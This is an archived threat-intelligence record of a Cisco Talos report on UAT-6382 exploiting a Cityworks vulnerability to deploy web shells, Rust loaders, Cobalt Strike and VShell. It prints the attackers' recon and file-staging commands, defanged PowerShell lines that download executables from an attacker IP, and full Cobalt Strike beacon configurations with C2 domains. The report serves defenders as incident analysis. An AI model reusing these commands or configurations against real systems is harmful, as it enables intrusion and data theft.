{
	"id": "c5b90ac3-78d8-4913-bf37-c1535f552f39",
	"created_at": "2026-04-06T00:20:54.036045Z",
	"updated_at": "2026-04-10T13:12:53.908917Z",
	"deleted_at": null,
	"sha1_hash": "6152483e59b406af1acbe7fab823da7da3b426e3",
	"title": "UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 345181,
	"plain_text": "UAT-6382 exploits Cityworks zero-day vulnerability to deliver\r\nmalware\r\nBy Asheer Malhotra\r\nPublished: 2025-05-22 · Archived: 2026-04-05 16:41:45 UTC\r\nCisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in\r\nCityworks, a popular asset management system.  \r\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories\r\npertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise\r\n(IOCs) related to the intrusion exploiting the CVE.  \r\nIOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap\r\nwith those listed in Trimble’s advisory.  \r\nTalos clusters this set of intrusions, exploiting CVE-2025-0994, under the “UAT-6382” umbrella of\r\nactivity. Based on tooling and tactics, techniques and procedures (TTPs) employed by the threat actor,\r\nTalos assesses with high confidence that the exploitation and subsequent post-compromise activity is\r\ncarried out by Chinese-speaking threat actors.  \r\nPost-compromise activity involves the rapid deployment of web shells such as AntSword and\r\nchinatso/Chopper on the underlying IIS web servers. UAT-6382 also employed the use of Rust-based\r\nloaders to deploy Cobalt Strike and VSHell malware to maintain long-term persistent access.  \r\nWe track the Rust-based loaders as “TetraLoader,” built using a recently publicly available malware\r\nbuilding framework called “MaLoader.” MaLoader, written in Simplified Chinese, allows its operators to\r\nwrap shellcode and other payloads into a Rust-based binary, resulting in the creation of TetraLoader.\r\nTalos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning\r\nJanuary 2025 when initial exploitation first took place. 
UAT-6382 successfully exploited CVE-2025-0994,\r\nconducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain\r\nlong-term access. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to\r\nutilities management. \r\nThe web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in\r\nthe Chinese language. Furthermore, the custom tooling, TetraLoader, was built using a malware-builder called\r\n“MaLoader” that is also written in Simplified Chinese. Based on the nature of this tooling, TTPs, hands-on-keyboard activity and victimology, Talos assesses with high confidence that UAT-6382 is a Chinese-speaking\r\nthreat actor.\r\nInitial reconnaissance \r\nSuccessful exploitation of the vulnerable Cityworks application leads to the attackers conducting preliminary\r\nreconnaissance to identify and fingerprint the server: \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 1 of 13\n\ncmd.exe /c ipconfig\r\ncmd.exe /c pwd\r\ncmd.exe /c dir\r\ncmd.exe /c dir ..\r\ncmd.exe /c dir c:\\\r\ncmd.exe /c dir c:\\inetpub\r\ncmd.exe /c tasklist\r\n Specific folders were enumerated before attempting to place web shells in them: \r\ncmd.exe /c dir c:\\inetpub\\wwwroot\r\ncmd.exe /c c:\\inetpub\\wwwroot\\CityworksServer\\WebSite\r\ncmd.exe /c dir c:\\inetpub\\wwwroot\\CityworksServer\\WebSite\\Assets\r\nUAT-6382 heavily utilizes web shells \r\nInitial reconnaissance almost immediately led to the deployment of web shells to establish backdoor entry into the\r\ncompromised network. These web shells consisted of multiple variations of AntSword, chinatso and Behinder\r\nalong with additional generic file uploaders containing messages written in the Chinese language.\r\nFigure 1. 
ASP-based file uploader deployed by UAT-6382.\r\nFile enumeration and staging for exfiltration \r\nUAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then\r\nstaged them in directories where they had deployed web shells for easy exfiltration: \r\ncmd.exe /c dir c:\\inetpub\\wwwroot\\CityworksServer\\\r\ncmd.exe /c copy c:\\inetpub\\wwwroot\\CityworksServer\\\u003cbackup_archives\u003e c:\\inetpub\\wwwroot\\CityworksServ\r\nDeployment of backdoors \r\nUAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell: \r\ncmd[.]exe /c powershell -Command Invoke-WebRequest -Uri 'hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[\r\ncmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/MCUCAT[.]exe\r\npowershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/TJPLYT[.]exe' -OutFile\r\ncmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/z44[.]exe' -\r\nThe implants Talos recovered are Rust-based loaders containing an encoded or encrypted payload. The payload is\r\ndecoded/decrypted and injected into a benign process by the loader component. We track the loaders as\r\n“TetraLoader.”\r\nTetraLoader analysis \r\nTetraLoader is a simple Rust-based loader. It will decode an embedded payload and inject it into a benign process\r\nsuch as notepad[.]exe to activate the payload. Talos has so far found two types of payloads deployed by\r\nTetraLoader on the infected endpoints: \r\n1. Cobalt Strike beacons: These are position-independent, in-memory Cobalt Strike beacon shellcodes that\r\nare injected into a specified benign process by TetraLoader. \r\n2. VShell stager: Position-independent shellcode, which we’ve identified as a stager for VShell, that talks to a\r\nhardcoded C2 server and executes code issued to it. 
\r\nTetraLoader is built using a relatively new payload builder framework known as “MaLoader,” which first\r\nappeared on GitHub in December 2024. MaLoader has multiple options to encode and embed shellcodes into\r\nTetraLoader, the Rust-based container. \r\nFigure 2. MaLoader’s builder interface\r\nMaLoader is written in Simplified Chinese, indicating that threat actors that employed it likely knew the language\r\nto a substantial degree of proficiency.\r\nCobalt Strike beacons \r\nThe Cobalt Strike beacons are relatively straightforward, with minimal changes as compared to traditionally\r\ngenerated Cobalt Strike beacons. One of the beacons Talos discovered reaches out to the command-and-control\r\n(C2) domain “cdn[.]lgaircon[.]xyz” and specifically consists of the following configuration settings:\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 37\r\nMaxDNS - Not Found\r\nPublicKey - b'0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\r\nC2Server - cdn[.]lgaircon[.]xyz,/jquery-3[.]3[.]1[.]min[.]js\r\nUserAgent - Not Found\r\nHttpPostUri - /jquery-3[.]3[.]2[.]min[.]js\r\nHttpGet_Metadata - Not Found\r\nHttpPost_Metadata - Not Found\r\nSpawnTo - b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not 
Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader - Host: cdn[.]lgaircon[.]xyz\r\nA second beacon using the same C2 domain consists of the following more detailed configuration:\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 35000\r\nMaxGetSize - 2097152\r\nJitter - 30\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - 00c96a736d29c55e29c5e3291aedb0fd\r\nC2Server - lgaircon[.]xyz,/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nHttpPostUri - /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG\r\nMalleable_C2_Instructions - NetBIOS decode 'a'\r\nHttpGet_Metadata - ConstHeaders\r\n Host: lgaircon[.]xyz\r\n Accept: */ *\r\n Cookie: MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D91\r\n ConstParams\r\n path=/calendar\r\n Metadata\r\n netbios\r\n parameter \"wa\"\r\nHttpPost_Metadata - ConstHeaders\r\n Host: lgaircon[.]xyz\r\n Accept: */ *\r\n SessionId\r\n netbios\r\n prepend \"wla42=\"\r\n prepend \"xid=730bf7;\"\r\n prepend \"MSPAuth=3EkAjDKjI;\"\r\n prepend \"ClientId=1C0F6C5D910F9;\"\r\n prepend \"MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;\"\r\n header \"Cookie\"\r\n Output\r\n 
netbios\r\n parameter \"wa\"\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - GET\r\nHttpPostChunk - 96\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - NtZOV6JzDr9QkEnX6bobPg==\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 26808\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll[.]dll:RtlUserThreadStart\r\n NtQueueApcThread-s\r\n SetThreadContext\r\n CreateRemoteThread\r\n kernel32[.]dll:LoadLibraryA\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - VirtualAllocEx\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nAnother beacon reaches out to C2 “www[.]roomako[.]com” and has the following configuration: \r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 25000\r\nMaxGetSize - 2801745\r\nJitter - 
37\r\nMaxDNS - Not Found\r\nPublicKey - b\"0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\r\nC2Server - www[.]roomako[.]com,/jquery-3[.]3[.]1[.]min[.]js\r\nUserAgent - Not Found\r\nHttpPostUri - /jquery-3[.]3[.]2[.]min[.]js\r\nHttpGet_Metadata - Not Found\r\nHttpPost_Metadata - Not Found\r\nSpawnTo - b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90'\r\nEmpty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\n bUsesCookies - True\r\nHostHeader - Host: www[.]roomako[.]com\r\nVShell stager \r\nThe VShell stager is relatively simple and uses rudimentary socket APIs to connect with a hardcoded C2 server\r\nsuch as “192[.]210[.]239[.]172:2219”. 
The stager, usually injected into a benign process by TetraLoader, initially\r\nsends a preliminary beacon to the C2 and then waits for a response. The response sent by the C2 is usually a\r\nsingle-byte XORed payload that is then executed in memory by the implant. This is likely UAT-6382's\r\nmodification to VShell. \r\nFigure 3. Implant receiving and executing shellcode from the C2.\r\nThe payload received by the VShell stager is in fact the actual VShell implant. VShell is a GoLang-based implant\r\nthat talks to its C2 and provides a wide variety of remote access trojan-based functionalities, such as the\r\ncapabilities to perform file management, run arbitrary commands, take screenshots and run NPS-based proxies on\r\nthe infected endpoint.\r\nFigure 4. A sample VShell C2 server with one client connected. \r\nLike other Chinese-authored tooling observed in the intrusions, VShell C2 panels are also written in Chinese.\r\nAlthough limited language support for English is available in the panel, it still mostly uses the Chinese language\r\nas seen in Figure 5, indicating that operators need to be familiar with the language to use the panel proficiently. \r\nFigure 5. VShell’s file manager panel uses Chinese even when configured to use English.\r\nCoverage \r\nWays our customers can detect and block this threat are listed below.  \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. 
\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. \r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work.  Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access. \r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.  \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. 
\r\nIndicators of compromise (IOCs) \r\nThe IOCs can also be found in our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/"
	],
	"report_names": [
		"uat-6382-exploits-cityworks-vulnerability"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee06ebae-7f2e-4523-8684-1d2b037fe18e",
			"created_at": "2026-02-04T02:00:03.713473Z",
			"updated_at": "2026-04-10T02:00:03.954313Z",
			"deleted_at": null,
			"main_name": "UAT-6382",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-6382",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434854,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.pdf",
		"text": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.txt",
		"img": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.jpg"
	}
}